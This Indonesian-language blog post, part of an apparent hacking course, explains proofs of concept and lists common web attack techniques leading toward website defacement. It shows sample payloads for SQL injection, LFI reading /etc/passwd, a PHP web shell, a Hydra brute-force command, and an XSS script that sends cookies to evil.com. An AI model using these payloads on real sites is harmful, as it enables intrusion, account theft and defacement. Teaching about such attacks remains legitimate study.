Apa itu POC Dan Teknik-Teknik Seputar Deface - Hacking Course Bagian 4

Hanya seorang wibu yang ingin membagikan ilmu pengetahuan seputar dunia hacking dan programming Januari 29, 2025

 



Poc


🔥 POC (Proof of Concept) dalam Dunia Hacking!

Yo, balik lagi bareng gua di blog hacking paling santuy! Kali ini kita bakal ngebahas sesuatu yang super penting sebelum lo belajar nge-exploit website, yaitu POC (Proof of Concept).

Kenapa ini penting? Karena lo harus paham cara kerja celah keamanan sebelum lo bisa ngegunainnya. Kalo lo asal brute force atau inject tanpa ngerti dasarnya, fix lo cuma jadi script kiddie yang sekadar nyoba tool orang lain.

Nah, kita bahas dulu POC itu apa, baru lanjut ke teknik eksploitasi yang paling sering dipake hacker! 🚀

🧐 Apa Itu POC (Proof of Concept)?

POC (Proof of Concept) adalah bukti bahwa sebuah celah keamanan bisa dieksploitasi. Biasanya, POC ini dipake buat ngebuktiin bahwa ada bug atau vulnerability di dalam sistem, dan hacker bisa menyalahgunakannya buat ngeakses sesuatu yang harusnya nggak bisa mereka akses.

Bayangin lo nemu lubang di pagar rumah orang, terus lo tunjukin ke pemilik rumah bahwa orang bisa masuk dari situ. Itu yang disebut POC dalam hacking! 😎

🔥 Jenis-Jenis POC dalam Dunia Hacking

Nah, dalam dunia hacking, ada beberapa jenis POC yang sering ditemuin. Berikut ini adalah beberapa yang paling terkenal:

1️⃣ POC dengan Screenshot atau Video

Ini POC yang paling simpel, hacker atau security researcher biasanya ngasih screenshot atau rekaman video buat nunjukin bug yang mereka temuin. Contoh: deface website, error SQL Injection yang muncul di layar, atau bypass login halaman admin.

2️⃣ POC dengan Payload atau Exploit Script

Di level ini, hacker ngebuat kode atau skrip eksploitasi buat nunjukin gimana bug itu bisa dimanfaatkan. Contohnya: kode Python buat SQL Injection, exploit Metasploit buat RCE, atau payload XSS yang bisa ngejalanin script berbahaya.

3️⃣ Full Chain Exploit (Exploit Kit)

Nah, kalo udah level advance, hacker nggak cuma nunjukin bug-nya doang, tapi mereka bikin exploit yang langsung bisa dijalanin otomatis! Contoh: exploit Log4j, Shellshock, atau RCE di Apache yang bisa langsung ngasih akses ke server.

🔥 Teknik Eksploitasi yang Paling Sering Dipake!

Sekarang kita bahas beberapa teknik eksploitasi yang sering dipake hacker buat ngebuat POC!

1️⃣ SQL Injection (SQLi) 🛠️

SQL Injection itu teknik buat ngejalanin perintah berbahaya ke dalam database website lewat input yang nggak difilter dengan baik.

📝 Contoh POC:

  • Tes form login dengan payload: 
    ' OR 1=1 --
  • Tes parameter URL dengan payload: 
    https://target.com/index.php?id=1' UNION SELECT 1,2,3 --

🔥 Impact: Bisa nge-dump database, ngeambil username & password admin, atau bahkan ngeambil semua data user!

2️⃣ XSS (Cross-Site Scripting) 🎭

XSS adalah teknik buat menyuntikkan kode JavaScript berbahaya ke dalam website, yang bisa ngeambil cookie atau ngubah tampilan website.

📝 Contoh POC:

  • Payload dasar: 
    <script>alert("Hacked by Me")</script>
  • Payload buat curi cookies: 
    <script>document.location='http://evil.com/steal.php?c='+document.cookie</script>

🔥 Impact: Bisa ngehack akun admin kalau berhasil ngeambil cookie session!

3️⃣ LFI (Local File Inclusion) 📂

LFI adalah teknik buat buka file internal server lewat parameter website yang rentan.

📝 Contoh POC:

  • Coba akses file /etc/passwd di Linux: 
    https://target.com/index.php?page=../../../../etc/passwd
  • Coba akses konfigurasi website: 
    https://target.com/index.php?page=../../../../../var/www/html/config.php

🔥 Impact: Bisa buat baca file penting di server, atau bahkan ngejalanin reverse shell!

4️⃣ RCE (Remote Code Execution) 💻

RCE adalah teknik yang paling bahaya! Ini bisa bikin hacker ngejalanin perintah langsung di server target.

📝 Contoh POC:

  • Coba ngejalanin perintah lewat URL: 
    https://target.com/vuln.php?cmd=whoami
  • Coba inject kode PHP di parameter website: 
    <?php system($_GET['cmd']); ?>

🔥 Impact: Bisa dapetin akses full ke server dan bikin hacker bisa ngejalanin reverse shell!

5️⃣ Brute Force Login 🔑

Brute force itu teknik buat nyoba login ke akun admin dengan menebak password secara otomatis.

📝 Contoh POC:

  • Coba login pake default username-password: 
    Username: admin  
Password: admin123
  • Gunakan tool Brute Force kayak Hydra atau WFuzz 
    hydra -l admin -P passwords.txt target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=failed"

🔥 Impact: Bisa masuk ke akun admin dan ngeganti tampilan website!

🎯 Kesimpulan

🔥 POC (Proof of Concept) itu bukti bahwa ada bug di sebuah sistem, dan bisa dieksploitasi dengan berbagai teknik.
🔥 Teknik eksploitasi yang paling sering dipake antara lain SQLi, XSS, LFI, RCE, dan Brute Force.
🔥 Hacking bukan cuma soal deface, tapi juga soal ngerti cara kerja sistem biar lo bisa ngegunain skill lo dengan bener!

📢 Next Step: Setelah ini, kita bakal bahas teknik deface yang paling gampang buat dicoba, tapi tetep dalam batas edukasi! 🚀


Tags
Hanya seorang wibu yang ingin membagikan ilmu pengetahuan seputar dunia hacking dan programming

Diposting oleh Hanya seorang wibu yang ingin membagikan ilmu pengetahuan seputar dunia hacking dan programming

Posting Komentar

0 Komentar